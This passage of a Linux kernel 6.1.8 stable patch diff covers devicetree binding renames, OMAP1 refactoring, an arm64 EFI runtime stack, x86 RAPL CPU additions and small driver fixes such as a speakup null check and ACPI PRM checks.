++    const: 1
++
++required:
++  - compatible
++  - reg
++  - clocks
++  - clock-names
++  - resets
++  - reset-names
++  - "#phy-cells"
++
++additionalProperties: false
++
++examples:
++  - |
++    phy@46000 {
++          compatible = "amlogic,g12a-usb3-pcie-phy";
++          reg = <0x46000 0x2000>;
++          clocks = <&ref_clk>;
++          clock-names = "ref_clk";
++          resets = <&phy_reset>;
++          reset-names = "phy";
++          #phy-cells = <1>;
++    };
+diff --git a/Documentation/devicetree/bindings/phy/amlogic,meson-g12a-usb2-phy.yaml b/Documentation/devicetree/bindings/phy/amlogic,meson-g12a-usb2-phy.yaml
+deleted file mode 100644
+index f3a5fbabbbb59..0000000000000
+--- a/Documentation/devicetree/bindings/phy/amlogic,meson-g12a-usb2-phy.yaml
++++ /dev/null
+@@ -1,78 +0,0 @@
+-# SPDX-License-Identifier: (GPL-2.0 OR BSD-2-Clause)
+-# Copyright 2019 BayLibre, SAS
+-%YAML 1.2
+----
+-$id: "http://devicetree.org/schemas/phy/amlogic,meson-g12a-usb2-phy.yaml#"
+-$schema: "http://devicetree.org/meta-schemas/core.yaml#"
+-
+-title: Amlogic G12A USB2 PHY
+-
+-maintainers:
+-  - Neil Armstrong <neil.armstrong@linaro.org>
+-
+-properties:
+-  compatible:
+-    enum:
+-      - amlogic,meson-g12a-usb2-phy
+-      - amlogic,meson-a1-usb2-phy
+-
+-  reg:
+-    maxItems: 1
+-
+-  clocks:
+-    maxItems: 1
+-
+-  clock-names:
+-    items:
+-      - const: xtal
+-
+-  resets:
+-    maxItems: 1
+-
+-  reset-names:
+-    items:
+-      - const: phy
+-
+-  "#phy-cells":
+-    const: 0
+-
+-  phy-supply:
+-    description:
+-      Phandle to a regulator that provides power to the PHY. This
+-      regulator will be managed during the PHY power on/off sequence.
+-
+-required:
+-  - compatible
+-  - reg
+-  - clocks
+-  - clock-names
+-  - resets
+-  - reset-names
+-  - "#phy-cells"
+-
+-if:
+-  properties:
+-    compatible:
+-      enum:
+-        - amlogic,meson-a1-usb-ctrl
+-
+-then:
+-  properties:
+-    power-domains:
+-      maxItems: 1
+-  required:
+-    - power-domains
+-
+-additionalProperties: false
+-
+-examples:
+-  - |
+-    phy@36000 {
+-          compatible = "amlogic,meson-g12a-usb2-phy";
+-          reg = <0x36000 0x2000>;
+-          clocks = <&xtal>;
+-          clock-names = "xtal";
+-          resets = <&phy_reset>;
+-          reset-names = "phy";
+-          #phy-cells = <0>;
+-    };
+diff --git a/Documentation/devicetree/bindings/phy/amlogic,meson-g12a-usb3-pcie-phy.yaml b/Documentation/devicetree/bindings/phy/amlogic,meson-g12a-usb3-pcie-phy.yaml
+deleted file mode 100644
+index 868b4e6fde71f..0000000000000
+--- a/Documentation/devicetree/bindings/phy/amlogic,meson-g12a-usb3-pcie-phy.yaml
++++ /dev/null
+@@ -1,59 +0,0 @@
+-# SPDX-License-Identifier: (GPL-2.0 OR BSD-2-Clause)
+-# Copyright 2019 BayLibre, SAS
+-%YAML 1.2
+----
+-$id: "http://devicetree.org/schemas/phy/amlogic,meson-g12a-usb3-pcie-phy.yaml#"
+-$schema: "http://devicetree.org/meta-schemas/core.yaml#"
+-
+-title: Amlogic G12A USB3 + PCIE Combo PHY
+-
+-maintainers:
+-  - Neil Armstrong <neil.armstrong@linaro.org>
+-
+-properties:
+-  compatible:
+-    enum:
+-      - amlogic,meson-g12a-usb3-pcie-phy
+-
+-  reg:
+-    maxItems: 1
+-
+-  clocks:
+-    maxItems: 1
+-
+-  clock-names:
+-    items:
+-      - const: ref_clk
+-
+-  resets:
+-    maxItems: 1
+-
+-  reset-names:
+-    items:
+-      - const: phy
+-
+-  "#phy-cells":
+-    const: 1
+-
+-required:
+-  - compatible
+-  - reg
+-  - clocks
+-  - clock-names
+-  - resets
+-  - reset-names
+-  - "#phy-cells"
+-
+-additionalProperties: false
+-
+-examples:
+-  - |
+-    phy@46000 {
+-          compatible = "amlogic,meson-g12a-usb3-pcie-phy";
+-          reg = <0x46000 0x2000>;
+-          clocks = <&ref_clk>;
+-          clock-names = "ref_clk";
+-          resets = <&phy_reset>;
+-          reset-names = "phy";
+-          #phy-cells = <1>;
+-    };
+diff --git a/MAINTAINERS b/MAINTAINERS
+index 886d3f69ee644..d4822ae39e396 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -11112,6 +11112,8 @@ M:	Kees Cook <keescook@chromium.org>
+ L:	linux-hardening@vger.kernel.org
+ S:	Supported
+ T:	git git://git.kernel.org/pub/scm/linux/kernel/git/kees/linux.git for-next/hardening
++F:	Documentation/ABI/testing/sysfs-kernel-oops_count
++F:	Documentation/ABI/testing/sysfs-kernel-warn_count
+ F:	include/linux/overflow.h
+ F:	include/linux/randomize_kstack.h
+ F:	mm/usercopy.c
+diff --git a/Makefile b/Makefile
+index 7eb6793ecfbfd..49261450039a1 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 7
++SUBLEVEL = 8
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/qcom-apq8084-ifc6540.dts b/arch/arm/boot/dts/qcom-apq8084-ifc6540.dts
+index 44cd72f1b1be4..116e59a3b76d0 100644
+--- a/arch/arm/boot/dts/qcom-apq8084-ifc6540.dts
++++ b/arch/arm/boot/dts/qcom-apq8084-ifc6540.dts
+@@ -19,16 +19,16 @@
+ 		serial@f995e000 {
+ 			status = "okay";
+ 		};
++	};
++};
+ 
+-		sdhci@f9824900 {
+-			bus-width = <8>;
+-			non-removable;
+-			status = "okay";
+-		};
++&sdhc_1 {
++	bus-width = <8>;
++	non-removable;
++	status = "okay";
++};
+ 
+-		sdhci@f98a4900 {
+-			cd-gpios = <&tlmm 122 GPIO_ACTIVE_LOW>;
+-			bus-width = <4>;
+-		};
+-	};
++&sdhc_2 {
++	cd-gpios = <&tlmm 122 GPIO_ACTIVE_LOW>;
++	bus-width = <4>;
+ };
+diff --git a/arch/arm/boot/dts/qcom-apq8084.dtsi b/arch/arm/boot/dts/qcom-apq8084.dtsi
+index f2fb7c975af84..69da87577ad0d 100644
+--- a/arch/arm/boot/dts/qcom-apq8084.dtsi
++++ b/arch/arm/boot/dts/qcom-apq8084.dtsi
+@@ -419,7 +419,7 @@
+ 			status = "disabled";
+ 		};
+ 
+-		mmc@f9824900 {
++		sdhc_1: mmc@f9824900 {
+ 			compatible = "qcom,apq8084-sdhci", "qcom,sdhci-msm-v4";
+ 			reg = <0xf9824900 0x11c>, <0xf9824000 0x800>;
+ 			reg-names = "hc", "core";
+@@ -432,7 +432,7 @@
+ 			status = "disabled";
+ 		};
+ 
+-		mmc@f98a4900 {
++		sdhc_2: mmc@f98a4900 {
+ 			compatible = "qcom,apq8084-sdhci", "qcom,sdhci-msm-v4";
+ 			reg = <0xf98a4900 0x11c>, <0xf98a4000 0x800>;
+ 			reg-names = "hc", "core";
+diff --git a/arch/arm/mach-omap1/Kconfig b/arch/arm/mach-omap1/Kconfig
+index 538a960257cc7..7ec7ada287e05 100644
+--- a/arch/arm/mach-omap1/Kconfig
++++ b/arch/arm/mach-omap1/Kconfig
+@@ -4,6 +4,7 @@ menuconfig ARCH_OMAP1
+ 	depends on ARCH_MULTI_V4T || ARCH_MULTI_V5
+ 	depends on CPU_LITTLE_ENDIAN
+ 	depends on ATAGS
++	select ARCH_OMAP
+ 	select ARCH_HAS_HOLES_MEMORYMODEL
+ 	select ARCH_OMAP
+ 	select CLKSRC_MMIO
+@@ -45,10 +46,6 @@ config ARCH_OMAP16XX
+ 	select CPU_ARM926T
+ 	select OMAP_DM_TIMER
+ 
+-config ARCH_OMAP1_ANY
+-	select ARCH_OMAP
+-	def_bool ARCH_OMAP730 || ARCH_OMAP850 || ARCH_OMAP15XX || ARCH_OMAP16XX
+-
+ config ARCH_OMAP
+ 	bool
+ 
+diff --git a/arch/arm/mach-omap1/Makefile b/arch/arm/mach-omap1/Makefile
+index 506074b86333f..0615cb0ba580b 100644
+--- a/arch/arm/mach-omap1/Makefile
++++ b/arch/arm/mach-omap1/Makefile
+@@ -3,8 +3,6 @@
+ # Makefile for the linux kernel.
+ #
+ 
+-ifdef CONFIG_ARCH_OMAP1_ANY
+-
+ # Common support
+ obj-y := io.o id.o sram-init.o sram.o time.o irq.o mux.o flash.o \
+ 	 serial.o devices.o dma.o omap-dma.o fb.o
+@@ -59,5 +57,3 @@ obj-$(CONFIG_ARCH_OMAP730)		+= gpio7xx.o
+ obj-$(CONFIG_ARCH_OMAP850)		+= gpio7xx.o
+ obj-$(CONFIG_ARCH_OMAP15XX)		+= gpio15xx.o
+ obj-$(CONFIG_ARCH_OMAP16XX)		+= gpio16xx.o
+-
+-endif
+diff --git a/arch/arm/mach-omap1/io.c b/arch/arm/mach-omap1/io.c
+index d2db9b8aed3fb..0074b011a05a4 100644
+--- a/arch/arm/mach-omap1/io.c
++++ b/arch/arm/mach-omap1/io.c
+@@ -22,17 +22,14 @@
+  * The machine specific code may provide the extra mapping besides the
+  * default mapping provided here.
+  */
+-static struct map_desc omap_io_desc[] __initdata = {
++#if defined (CONFIG_ARCH_OMAP730) || defined (CONFIG_ARCH_OMAP850)
++static struct map_desc omap7xx_io_desc[] __initdata = {
+ 	{
+ 		.virtual	= OMAP1_IO_VIRT,
+ 		.pfn		= __phys_to_pfn(OMAP1_IO_PHYS),
+ 		.length		= OMAP1_IO_SIZE,
+ 		.type		= MT_DEVICE
+-	}
+-};
+-
+-#if defined (CONFIG_ARCH_OMAP730) || defined (CONFIG_ARCH_OMAP850)
+-static struct map_desc omap7xx_io_desc[] __initdata = {
++	},
+ 	{
+ 		.virtual	= OMAP7XX_DSP_BASE,
+ 		.pfn		= __phys_to_pfn(OMAP7XX_DSP_START),
+@@ -49,6 +46,12 @@ static struct map_desc omap7xx_io_desc[] __initdata = {
+ 
+ #ifdef CONFIG_ARCH_OMAP15XX
+ static struct map_desc omap1510_io_desc[] __initdata = {
++	{
++		.virtual	= OMAP1_IO_VIRT,
++		.pfn		= __phys_to_pfn(OMAP1_IO_PHYS),
++		.length		= OMAP1_IO_SIZE,
++		.type		= MT_DEVICE
++	},
+ 	{
+ 		.virtual	= OMAP1510_DSP_BASE,
+ 		.pfn		= __phys_to_pfn(OMAP1510_DSP_START),
+@@ -65,6 +68,12 @@ static struct map_desc omap1510_io_desc[] __initdata = {
+ 
+ #if defined(CONFIG_ARCH_OMAP16XX)
+ static struct map_desc omap16xx_io_desc[] __initdata = {
++	{
++		.virtual	= OMAP1_IO_VIRT,
++		.pfn		= __phys_to_pfn(OMAP1_IO_PHYS),
++		.length		= OMAP1_IO_SIZE,
++		.type		= MT_DEVICE
++	},
+ 	{
+ 		.virtual	= OMAP16XX_DSP_BASE,
+ 		.pfn		= __phys_to_pfn(OMAP16XX_DSP_START),
+@@ -79,18 +88,9 @@ static struct map_desc omap16xx_io_desc[] __initdata = {
+ };
+ #endif
+ 
+-/*
+- * Maps common IO regions for omap1
+- */
+-static void __init omap1_map_common_io(void)
+-{
+-	iotable_init(omap_io_desc, ARRAY_SIZE(omap_io_desc));
+-}
+-
+ #if defined (CONFIG_ARCH_OMAP730) || defined (CONFIG_ARCH_OMAP850)
+ void __init omap7xx_map_io(void)
+ {
+-	omap1_map_common_io();
+ 	iotable_init(omap7xx_io_desc, ARRAY_SIZE(omap7xx_io_desc));
+ }
+ #endif
+@@ -98,7 +98,6 @@ void __init omap7xx_map_io(void)
+ #ifdef CONFIG_ARCH_OMAP15XX
+ void __init omap15xx_map_io(void)
+ {
+-	omap1_map_common_io();
+ 	iotable_init(omap1510_io_desc, ARRAY_SIZE(omap1510_io_desc));
+ }
+ #endif
+@@ -106,7 +105,6 @@ void __init omap15xx_map_io(void)
+ #if defined(CONFIG_ARCH_OMAP16XX)
+ void __init omap16xx_map_io(void)
+ {
+-	omap1_map_common_io();
+ 	iotable_init(omap16xx_io_desc, ARRAY_SIZE(omap16xx_io_desc));
+ }
+ #endif
+diff --git a/arch/arm/mach-omap1/mcbsp.c b/arch/arm/mach-omap1/mcbsp.c
+index 05c25c432449f..b1632cbe37e6f 100644
+--- a/arch/arm/mach-omap1/mcbsp.c
++++ b/arch/arm/mach-omap1/mcbsp.c
+@@ -89,7 +89,6 @@ static struct omap_mcbsp_ops omap1_mcbsp_ops = {
+ #define OMAP1610_MCBSP2_BASE	0xfffb1000
+ #define OMAP1610_MCBSP3_BASE	0xe1017000
+ 
+-#if defined(CONFIG_ARCH_OMAP730) || defined(CONFIG_ARCH_OMAP850)
+ struct resource omap7xx_mcbsp_res[][6] = {
+ 	{
+ 		{
+@@ -159,14 +158,7 @@ static struct omap_mcbsp_platform_data omap7xx_mcbsp_pdata[] = {
+ };
+ #define OMAP7XX_MCBSP_RES_SZ		ARRAY_SIZE(omap7xx_mcbsp_res[1])
+ #define OMAP7XX_MCBSP_COUNT		ARRAY_SIZE(omap7xx_mcbsp_res)
+-#else
+-#define omap7xx_mcbsp_res_0		NULL
+-#define omap7xx_mcbsp_pdata		NULL
+-#define OMAP7XX_MCBSP_RES_SZ		0
+-#define OMAP7XX_MCBSP_COUNT		0
+-#endif
+ 
+-#ifdef CONFIG_ARCH_OMAP15XX
+ struct resource omap15xx_mcbsp_res[][6] = {
+ 	{
+ 		{
+@@ -266,14 +258,7 @@ static struct omap_mcbsp_platform_data omap15xx_mcbsp_pdata[] = {
+ };
+ #define OMAP15XX_MCBSP_RES_SZ		ARRAY_SIZE(omap15xx_mcbsp_res[1])
+ #define OMAP15XX_MCBSP_COUNT		ARRAY_SIZE(omap15xx_mcbsp_res)
+-#else
+-#define omap15xx_mcbsp_res_0		NULL
+-#define omap15xx_mcbsp_pdata		NULL
+-#define OMAP15XX_MCBSP_RES_SZ		0
+-#define OMAP15XX_MCBSP_COUNT		0
+-#endif
+ 
+-#ifdef CONFIG_ARCH_OMAP16XX
+ struct resource omap16xx_mcbsp_res[][6] = {
+ 	{
+ 		{
+@@ -373,12 +358,6 @@ static struct omap_mcbsp_platform_data omap16xx_mcbsp_pdata[] = {
+ };
+ #define OMAP16XX_MCBSP_RES_SZ		ARRAY_SIZE(omap16xx_mcbsp_res[1])
+ #define OMAP16XX_MCBSP_COUNT		ARRAY_SIZE(omap16xx_mcbsp_res)
+-#else
+-#define omap16xx_mcbsp_res_0		NULL
+-#define omap16xx_mcbsp_pdata		NULL
+-#define OMAP16XX_MCBSP_RES_SZ		0
+-#define OMAP16XX_MCBSP_COUNT		0
+-#endif
+ 
+ static void omap_mcbsp_register_board_cfg(struct resource *res, int res_count,
+ 			struct omap_mcbsp_platform_data *config, int size)
+diff --git a/arch/arm/mach-omap1/pm.h b/arch/arm/mach-omap1/pm.h
+index d9165709c5323..0d1f092821ff8 100644
+--- a/arch/arm/mach-omap1/pm.h
++++ b/arch/arm/mach-omap1/pm.h
+@@ -106,13 +106,6 @@
+ #define OMAP7XX_IDLECT3		0xfffece24
+ #define OMAP7XX_IDLE_LOOP_REQUEST	0x0C00
+ 
+-#if     !defined(CONFIG_ARCH_OMAP730) && \
+-	!defined(CONFIG_ARCH_OMAP850) && \
+-	!defined(CONFIG_ARCH_OMAP15XX) && \
+-	!defined(CONFIG_ARCH_OMAP16XX)
+-#warning "Power management for this processor not implemented yet"
+-#endif
+-
+ #ifndef __ASSEMBLER__
+ 
+ #include <linux/clk.h>
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp.dtsi b/arch/arm64/boot/dts/freescale/imx8mp.dtsi
+index bb916a0948a8f..d944ecca1b3c2 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mp.dtsi
+@@ -1279,7 +1279,7 @@
+ 			reg = <0x32f10100 0x8>,
+ 			      <0x381f0000 0x20>;
+ 			clocks = <&clk IMX8MP_CLK_HSIO_ROOT>,
+-				 <&clk IMX8MP_CLK_USB_ROOT>;
++				 <&clk IMX8MP_CLK_USB_SUSP>;
+ 			clock-names = "hsio", "suspend";
+ 			interrupts = <GIC_SPI 148 IRQ_TYPE_LEVEL_HIGH>;
+ 			power-domains = <&hsio_blk_ctrl IMX8MP_HSIOBLK_PD_USB>;
+@@ -1292,9 +1292,9 @@
+ 			usb_dwc3_0: usb@38100000 {
+ 				compatible = "snps,dwc3";
+ 				reg = <0x38100000 0x10000>;
+-				clocks = <&clk IMX8MP_CLK_HSIO_AXI>,
++				clocks = <&clk IMX8MP_CLK_USB_ROOT>,
+ 					 <&clk IMX8MP_CLK_USB_CORE_REF>,
+-					 <&clk IMX8MP_CLK_USB_ROOT>;
++					 <&clk IMX8MP_CLK_USB_SUSP>;
+ 				clock-names = "bus_early", "ref", "suspend";
+ 				interrupts = <GIC_SPI 40 IRQ_TYPE_LEVEL_HIGH>;
+ 				phys = <&usb3_phy0>, <&usb3_phy0>;
+@@ -1321,7 +1321,7 @@
+ 			reg = <0x32f10108 0x8>,
+ 			      <0x382f0000 0x20>;
+ 			clocks = <&clk IMX8MP_CLK_HSIO_ROOT>,
+-				 <&clk IMX8MP_CLK_USB_ROOT>;
++				 <&clk IMX8MP_CLK_USB_SUSP>;
+ 			clock-names = "hsio", "suspend";
+ 			interrupts = <GIC_SPI 149 IRQ_TYPE_LEVEL_HIGH>;
+ 			power-domains = <&hsio_blk_ctrl IMX8MP_HSIOBLK_PD_USB>;
+@@ -1334,9 +1334,9 @@
+ 			usb_dwc3_1: usb@38200000 {
+ 				compatible = "snps,dwc3";
+ 				reg = <0x38200000 0x10000>;
+-				clocks = <&clk IMX8MP_CLK_HSIO_AXI>,
++				clocks = <&clk IMX8MP_CLK_USB_ROOT>,
+ 					 <&clk IMX8MP_CLK_USB_CORE_REF>,
+-					 <&clk IMX8MP_CLK_USB_ROOT>;
++					 <&clk IMX8MP_CLK_USB_SUSP>;
+ 				clock-names = "bus_early", "ref", "suspend";
+ 				interrupts = <GIC_SPI 41 IRQ_TYPE_LEVEL_HIGH>;
+ 				phys = <&usb3_phy1>, <&usb3_phy1>;
+diff --git a/arch/arm64/include/asm/efi.h b/arch/arm64/include/asm/efi.h
+index 439e2bc5d5d8b..b9f3165075c9d 100644
+--- a/arch/arm64/include/asm/efi.h
++++ b/arch/arm64/include/asm/efi.h
+@@ -25,6 +25,7 @@ int efi_set_mapping_permissions(struct mm_struct *mm, efi_memory_desc_t *md);
+ ({									\
+ 	efi_virtmap_load();						\
+ 	__efi_fpsimd_begin();						\
++	spin_lock(&efi_rt_lock);					\
+ })
+ 
+ #undef arch_efi_call_virt
+@@ -33,10 +34,12 @@ int efi_set_mapping_permissions(struct mm_struct *mm, efi_memory_desc_t *md);
+ 
+ #define arch_efi_call_virt_teardown()					\
+ ({									\
++	spin_unlock(&efi_rt_lock);					\
+ 	__efi_fpsimd_end();						\
+ 	efi_virtmap_unload();						\
+ })
+ 
++extern spinlock_t efi_rt_lock;
+ efi_status_t __efi_rt_asm_wrapper(void *, const char *, ...);
+ 
+ #define ARCH_EFI_IRQ_FLAGS_MASK (PSR_D_BIT | PSR_A_BIT | PSR_I_BIT | PSR_F_BIT)
+diff --git a/arch/arm64/kernel/efi-rt-wrapper.S b/arch/arm64/kernel/efi-rt-wrapper.S
+index 75691a2641c1c..2d3c4b02393e4 100644
+--- a/arch/arm64/kernel/efi-rt-wrapper.S
++++ b/arch/arm64/kernel/efi-rt-wrapper.S
+@@ -4,6 +4,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <asm/assembler.h>
+ 
+ SYM_FUNC_START(__efi_rt_asm_wrapper)
+ 	stp	x29, x30, [sp, #-32]!
+@@ -16,6 +17,12 @@ SYM_FUNC_START(__efi_rt_asm_wrapper)
+ 	 */
+ 	stp	x1, x18, [sp, #16]
+ 
++	ldr_l	x16, efi_rt_stack_top
++	mov	sp, x16
++#ifdef CONFIG_SHADOW_CALL_STACK
++	str	x18, [sp, #-16]!
++#endif
++
+ 	/*
+ 	 * We are lucky enough that no EFI runtime services take more than
+ 	 * 5 arguments, so all are passed in registers rather than via the
+@@ -29,6 +36,7 @@ SYM_FUNC_START(__efi_rt_asm_wrapper)
+ 	mov	x4, x6
+ 	blr	x8
+ 
++	mov	sp, x29
+ 	ldp	x1, x2, [sp, #16]
+ 	cmp	x2, x18
+ 	ldp	x29, x30, [sp], #32
+@@ -42,6 +50,10 @@ SYM_FUNC_START(__efi_rt_asm_wrapper)
+ 	 * called with preemption disabled and a separate shadow stack is used
+ 	 * for interrupts.
+ 	 */
+-	mov	x18, x2
++#ifdef CONFIG_SHADOW_CALL_STACK
++	ldr_l	x18, efi_rt_stack_top
++	ldr	x18, [x18, #-16]
++#endif
++
+ 	b	efi_handle_corrupted_x18	// tail call
+ SYM_FUNC_END(__efi_rt_asm_wrapper)
+diff --git a/arch/arm64/kernel/efi.c b/arch/arm64/kernel/efi.c
+index a908a37f03678..386bd81ca12bb 100644
+--- a/arch/arm64/kernel/efi.c
++++ b/arch/arm64/kernel/efi.c
+@@ -144,3 +144,30 @@ asmlinkage efi_status_t efi_handle_corrupted_x18(efi_status_t s, const char *f)
+ 	pr_err_ratelimited(FW_BUG "register x18 corrupted by EFI %s\n", f);
+ 	return s;
+ }
++
++DEFINE_SPINLOCK(efi_rt_lock);
++
++asmlinkage u64 *efi_rt_stack_top __ro_after_init;
++
++/* EFI requires 8 KiB of stack space for runtime services */
++static_assert(THREAD_SIZE >= SZ_8K);
++
++static int __init arm64_efi_rt_init(void)
++{
++	void *p;
++
++	if (!efi_enabled(EFI_RUNTIME_SERVICES))
++		return 0;
++
++	p = __vmalloc_node(THREAD_SIZE, THREAD_ALIGN, GFP_KERNEL,
++			   NUMA_NO_NODE, &&l);
++l:	if (!p) {
++		pr_warn("Failed to allocate EFI runtime stack\n");
++		clear_bit(EFI_RUNTIME_SERVICES, &efi.flags);
++		return -ENOMEM;
++	}
++
++	efi_rt_stack_top = p + THREAD_SIZE;
++	return 0;
++}
++core_initcall(arm64_efi_rt_init);
+diff --git a/arch/loongarch/kernel/cpu-probe.c b/arch/loongarch/kernel/cpu-probe.c
+index 255a09876ef28..3a3fce2d78461 100644
+--- a/arch/loongarch/kernel/cpu-probe.c
++++ b/arch/loongarch/kernel/cpu-probe.c
+@@ -94,7 +94,7 @@ static void cpu_probe_common(struct cpuinfo_loongarch *c)
+ 	c->options = LOONGARCH_CPU_CPUCFG | LOONGARCH_CPU_CSR |
+ 		     LOONGARCH_CPU_TLB | LOONGARCH_CPU_VINT | LOONGARCH_CPU_WATCH;
+ 
+-	elf_hwcap |= HWCAP_LOONGARCH_CRC32;
++	elf_hwcap = HWCAP_LOONGARCH_CPUCFG | HWCAP_LOONGARCH_CRC32;
+ 
+ 	config = read_cpucfg(LOONGARCH_CPUCFG1);
+ 	if (config & CPUCFG1_UAL) {
+diff --git a/arch/riscv/boot/dts/sifive/fu740-c000.dtsi b/arch/riscv/boot/dts/sifive/fu740-c000.dtsi
+index 43bed6c0a84fe..5235fd1c9cb67 100644
+--- a/arch/riscv/boot/dts/sifive/fu740-c000.dtsi
++++ b/arch/riscv/boot/dts/sifive/fu740-c000.dtsi
+@@ -328,7 +328,7 @@
+ 			bus-range = <0x0 0xff>;
+ 			ranges = <0x81000000  0x0 0x60080000  0x0 0x60080000 0x0 0x10000>,      /* I/O */
+ 				 <0x82000000  0x0 0x60090000  0x0 0x60090000 0x0 0xff70000>,    /* mem */
+-				 <0x82000000  0x0 0x70000000  0x0 0x70000000 0x0 0x1000000>,    /* mem */
++				 <0x82000000  0x0 0x70000000  0x0 0x70000000 0x0 0x10000000>,    /* mem */
+ 				 <0xc3000000 0x20 0x00000000 0x20 0x00000000 0x20 0x00000000>;  /* mem prefetchable */
+ 			num-lanes = <0x8>;
+ 			interrupts = <56>, <57>, <58>, <59>, <60>, <61>, <62>, <63>, <64>;
+diff --git a/arch/x86/events/rapl.c b/arch/x86/events/rapl.c
+index a829492bca4c1..52e6e7ed4f78a 100644
+--- a/arch/x86/events/rapl.c
++++ b/arch/x86/events/rapl.c
+@@ -800,13 +800,18 @@ static const struct x86_cpu_id rapl_model_match[] __initconst = {
+ 	X86_MATCH_INTEL_FAM6_MODEL(ICELAKE_X,		&model_hsx),
+ 	X86_MATCH_INTEL_FAM6_MODEL(COMETLAKE_L,		&model_skl),
+ 	X86_MATCH_INTEL_FAM6_MODEL(COMETLAKE,		&model_skl),
++	X86_MATCH_INTEL_FAM6_MODEL(TIGERLAKE_L,		&model_skl),
++	X86_MATCH_INTEL_FAM6_MODEL(TIGERLAKE,		&model_skl),
+ 	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE,		&model_skl),
+ 	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE_L,		&model_skl),
+ 	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE_N,		&model_skl),
+ 	X86_MATCH_INTEL_FAM6_MODEL(SAPPHIRERAPIDS_X,	&model_spr),
++	X86_MATCH_INTEL_FAM6_MODEL(EMERALDRAPIDS_X,	&model_spr),
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE,		&model_skl),
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_P,	&model_skl),
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_S,	&model_skl),
++	X86_MATCH_INTEL_FAM6_MODEL(METEORLAKE,		&model_skl),
++	X86_MATCH_INTEL_FAM6_MODEL(METEORLAKE_L,	&model_skl),
+ 	{},
+ };
+ MODULE_DEVICE_TABLE(x86cpu, rapl_model_match);
+diff --git a/arch/x86/kernel/fpu/init.c b/arch/x86/kernel/fpu/init.c
+index 8946f89761cc3..851eb13edc014 100644
+--- a/arch/x86/kernel/fpu/init.c
++++ b/arch/x86/kernel/fpu/init.c
+@@ -133,9 +133,6 @@ static void __init fpu__init_system_generic(void)
+ 	fpu__init_system_mxcsr();
+ }
+ 
+-/* Get alignment of the TYPE. */
+-#define TYPE_ALIGN(TYPE) offsetof(struct { char x; TYPE test; }, test)
+-
+ /*
+  * Enforce that 'MEMBER' is the last field of 'TYPE'.
+  *
+@@ -143,8 +140,8 @@ static void __init fpu__init_system_generic(void)
+  * because that's how C aligns structs.
+  */
+ #define CHECK_MEMBER_AT_END_OF(TYPE, MEMBER) \
+-	BUILD_BUG_ON(sizeof(TYPE) != ALIGN(offsetofend(TYPE, MEMBER), \
+-					   TYPE_ALIGN(TYPE)))
++	BUILD_BUG_ON(sizeof(TYPE) !=         \
++		     ALIGN(offsetofend(TYPE, MEMBER), _Alignof(TYPE)))
+ 
+ /*
+  * We append the 'struct fpu' to the task_struct:
+diff --git a/arch/x86/lib/iomap_copy_64.S b/arch/x86/lib/iomap_copy_64.S
+index a1f9416bf67a5..6ff2f56cb0f71 100644
+--- a/arch/x86/lib/iomap_copy_64.S
++++ b/arch/x86/lib/iomap_copy_64.S
+@@ -10,6 +10,6 @@
+  */
+ SYM_FUNC_START(__iowrite32_copy)
+ 	movl %edx,%ecx
+-	rep movsd
++	rep movsl
+ 	RET
+ SYM_FUNC_END(__iowrite32_copy)
+diff --git a/block/mq-deadline.c b/block/mq-deadline.c
+index 6672f1bce3795..f10c2a0d18d41 100644
+--- a/block/mq-deadline.c
++++ b/block/mq-deadline.c
+@@ -294,7 +294,7 @@ static inline int deadline_check_fifo(struct dd_per_prio *per_prio,
+ /*
+  * Check if rq has a sequential request preceding it.
+  */
+-static bool deadline_is_seq_writes(struct deadline_data *dd, struct request *rq)
++static bool deadline_is_seq_write(struct deadline_data *dd, struct request *rq)
+ {
+ 	struct request *prev = deadline_earlier_request(rq);
+ 
+@@ -353,7 +353,7 @@ deadline_fifo_request(struct deadline_data *dd, struct dd_per_prio *per_prio,
+ 	list_for_each_entry(rq, &per_prio->fifo_list[DD_WRITE], queuelist) {
+ 		if (blk_req_can_dispatch_to_zone(rq) &&
+ 		    (blk_queue_nonrot(rq->q) ||
+-		     !deadline_is_seq_writes(dd, rq)))
++		     !deadline_is_seq_write(dd, rq)))
+ 			goto out;
+ 	}
+ 	rq = NULL;
+diff --git a/drivers/accessibility/speakup/spk_ttyio.c b/drivers/accessibility/speakup/spk_ttyio.c
+index 08cf8a17754bb..07373b3debd1e 100644
+--- a/drivers/accessibility/speakup/spk_ttyio.c
++++ b/drivers/accessibility/speakup/spk_ttyio.c
+@@ -354,6 +354,9 @@ void spk_ttyio_release(struct spk_synth *in_synth)
+ {
+ 	struct tty_struct *tty = in_synth->dev;
+ 
++	if (tty == NULL)
++		return;
++
+ 	tty_lock(tty);
+ 
+ 	if (tty->ops->close)
+diff --git a/drivers/acpi/prmt.c b/drivers/acpi/prmt.c
+index 998101cf16e47..3d4c4620f9f95 100644
+--- a/drivers/acpi/prmt.c
++++ b/drivers/acpi/prmt.c
+@@ -236,6 +236,11 @@ static acpi_status acpi_platformrt_space_handler(u32 function,
+ 	efi_status_t status;
+ 	struct prm_context_buffer context;
+ 
++	if (!efi_enabled(EFI_RUNTIME_SERVICES)) {
++		pr_err_ratelimited("PRM: EFI runtime services no longer available\n");
++		return AE_NO_HANDLER;
++	}
++
+ 	/*
+ 	 * The returned acpi_status will always be AE_OK. Error values will be
+ 	 * saved in the first byte of the PRM message buffer to be used by ASL.
+@@ -325,6 +330,11 @@ void __init init_prmt(void)
+ 
+ 	pr_info("PRM: found %u modules\n", mc);
+ 
++	if (!efi_enabled(EFI_RUNTIME_SERVICES)) {
++		pr_err("PRM: EFI runtime services unavailable\n");
++		return;
++	}
++
+ 	status = acpi_install_address_space_handler(ACPI_ROOT_OBJECT,
+ 						    ACPI_ADR_SPACE_PLATFORM_RT,
+ 						    &acpi_platformrt_space_handler,
